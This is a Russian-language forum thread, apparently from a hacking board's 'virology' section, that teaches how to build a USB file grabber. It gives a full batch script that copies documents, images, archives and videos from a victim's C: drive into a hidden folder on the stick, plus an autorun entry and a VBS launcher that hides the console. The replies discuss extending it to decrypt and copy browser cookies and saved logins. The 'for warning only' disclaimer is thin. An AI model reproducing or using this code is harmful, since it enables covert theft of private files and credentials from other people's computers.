Загрузка...

Автоматический граббер файлов на флешке

Тема в разделе Вирусология создана пользователем Хаус 14 авг 2023. 497 просмотров

Загрузка...
  1. Хаус
    Хаус Автор темы 14 авг 2023 Продам отдел диагностики 303 15 сен 2019
    Привет! :animewave:
    Я продолжаю разбирать свою папку с проектами, найдя в ней интересный (нет) вариант граббера в флешке
    И так, приступим:
    Что он грабит, зачем он вообще нужон?
    Так во-от.. Эта штука собирает со всего компьютера файлы с расширениями
    *.doc *.pdf *.xls *.jpeg *.tif *.txt *.ppt *.mp4 *.mpeg *.rar *.zip *.psd *.cdr
    Человеку нужен был туториал, вот выкладываю для всех​
    Готовый архивчик со файлами можно найти туть
    Его достаточно разархивировать на флешку, поставить всем файлам атрибут скрыт, вуаля

======================================================================================================================================
    ======================================================================================================================================
    Ну, а если вы очень додельные, хотите сделать все сами, то едем дальше:
    Создаем main.bat на флешке, убеждаемся что у нас включен просмотр скрытых файлов и папок тут -> [IMG]
    (У меня слегка другой проводник, не пугайтесь, в дефолтном он находится во вкладке "вид")
    В общем, идем в main.bat, прописывая в него такой код:
    Код
    @echo off
    set "destination_folder=%~dp0JustFolder"

for /r C:\ /d %%d in (*) do (
    for %%i in ("%%d\*.doc" "%%d\*.pdf" "%%d\*.xls" "%%d\*.jpeg" "%%d\*.tif" "%%d\*.txt" "%%d\*.ppt" "%%d\*.mp4" "%%d\*.mpeg" "%%d\*.rar" "%%d\*.zip" "%%d\*.psd" "%%d\*.cdr") do (
    copy "%%i" "%destination_folder%\"
    )
    )
    По желанию, можете добавить свои расширения файлов, которые будут вороваться в 5 строчке, по алгоритму

- Окей, создали... А что дальше?
    Ну, создадим папку justFolder и так же скроем ее.
    - Да не, я не про это! Что делать с консолью при открытии, она не скрывается, да и на флешке ничего не запускается!
    Спокойно. Щас все будем делать по порядку:
    Все те же операции, создаем, скрываем, редактируем, вставляем код:
    Код
    [autorun]
    open=hide.vbs
    Спокойно, не страшно, что у нас еще нет это хайд.вбс, скоро сделаем!

- Так, давай уже скроем эту бесящую консоль, она меня прямо раздражает!
    Без проблем, читаем дальше:
    Пора становиться ассасинами, скрываясь на компьютере жертвы!
    Я думаю, мне не нужно повторять алгоритм работы создания файла, да? Прекрасно!
    - ...
    Кидаем в hide.vbs вот такой вот кодик:
    Код
    Set WinScriptHost = CreateObject("WScript.Shell")
    strCurrentDirectory = CreateObject("Scripting.FileSystemObject").GetAbsolutePathName(".")
    strScriptPath = strCurrentDirectory & "\main.bat"
    WinScriptHost.Run Chr(34) & strScriptPath & Chr(34), 0, false
    Set WinScriptHost = Nothing
    Все это скрываем, кидая на флешку​
    Ура! Мы сделали это! :pepeHacker:
    Теперь, вставляя эту флешку в компьютер точно не своей жертвы, мы собираем все файлы в одну удобную папку на флешке.
    Я не несу ответственность за ваши действия, статья написана только для предостережения пользователей от попадания в ловушку таким не хитрым способом.
    и да, у меня раздвоение личности в темах, я конченый, бегите​
    Спасибо за прочтение темы!:animeyessir:

14 авг 2023 Изменено
  2. GooseG4G
    GooseG4G 14 авг 2023 99 14 янв 2018
    А можно автоматом скрытый exe запустить для расшифровки cookies и login data и их копирования?

1. GooseG4G
      GooseG4G, или это можно в батник дописать?:rollingcat:
    2. Хаус Автор темы
      GooseG4G, чисто теоритически, это может пойти в батник, но и exe можно в скрытом режиме запускать, нужно тогда подредактировать hide.vbs